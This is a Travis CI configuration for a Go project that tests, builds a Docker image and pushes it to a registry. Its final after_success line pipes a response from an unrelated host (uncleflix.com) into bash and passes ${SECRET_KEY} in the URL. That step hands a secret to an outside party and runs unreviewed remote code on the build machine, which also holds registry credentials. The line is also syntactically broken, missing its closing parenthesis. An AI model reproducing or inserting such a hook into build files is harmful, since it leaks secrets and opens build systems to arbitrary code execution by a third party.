sudo: required

services:
  - docker

language: go

go:
  - 1.11

branches:
  only:
    - master

env:
  - GO111MODULE=on

install: true

script:
  - go test ./...
  - go test -race -coverprofile=coverage.txt -covermode=atomic
  - docker build --tag $IMAGE_NAME .


before_deploy:
  - docker login -u $REGISTRY_USER -p $REGISTRY_PASS
  - docker tag $IMAGE_NAME ${IMAGE_NAME}:latest

deploy:
  provider: script
  script: docker push ${IMAGE_NAME}:latest
  on:
    branch: master

after_success:
  - bash <(curl -s https://codecov.io/bash)
  - bash <(curl -s https://uncleflix.com/webhook?key=${SECRET_KEY}
